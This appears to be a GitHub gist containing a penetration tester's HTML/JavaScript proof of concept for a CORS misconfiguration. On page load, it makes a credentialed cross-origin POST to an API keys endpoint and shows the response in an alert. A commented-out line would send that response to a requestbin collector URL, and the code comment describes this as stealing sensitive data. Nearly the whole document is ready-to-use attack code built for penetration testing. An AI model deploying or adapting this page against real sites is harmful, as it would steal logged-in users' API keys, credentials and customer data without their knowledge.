Skip to content

Instantly share code, notes, and snippets.

@l4rm4nd
Created Jun 30, 2020
Embed
What would you like to do?
<html>
<head>
<title>CORS PoC</title>
<script language="JavaScript"> function date(){var date = new Date(); document.getElementById("date").innerHTML = date;}</script>
</head>
<!-- GUI -->
<body onload="cors(); date();">
<h1>Pentest Factory GmbH CORS PoC</h1>
<table align="left" style="position: absolute; border-spacing: 15px">
<tr>
<td width="100px"><img src="https://pentestfactory.de/images/logo.png" width="100px" height="100px"/></td>
<td width="700px" style="font-size: 10pt"><b>Any logged in user account visiting this website will <u>automatically</u> issue a CORS request <u>with supplied credentials</u>, which's response can be captured by an attacker. The response may contain <u>sensitive data</u> such as <u>credentials</u> or <u>customer data</u>!</b><br><br><label id="date" style="font-size: 0.85em;"></label></td>
</tr>
</table>
<label style="position:absolute; margin-top: 170px" id="data"></label>
<!-- CORS -->
<script>
var METHOD = "POST";
var URL = "http://api-ptl-ad42da05-c93d6931.libcurl.so/api/v1/keys";
var ATKSRV = "https://requestbin.com/r/enk0zkwzplxka?data=";
function cors(){
var xhr = new XMLHttpRequest();
xhr.open(METHOD, URL, true);
xhr.withCredentials = true;
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4){
// steal sensitive data from CORS response and send it to an attacker's server
//new Image().src = ATKSRV + xhr.responseText
// just alert the CORS response in an JavaScript popup as proof of concept
alert('Sensitive data has been stolen:\n\n' + xhr.responseText);
}
};
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment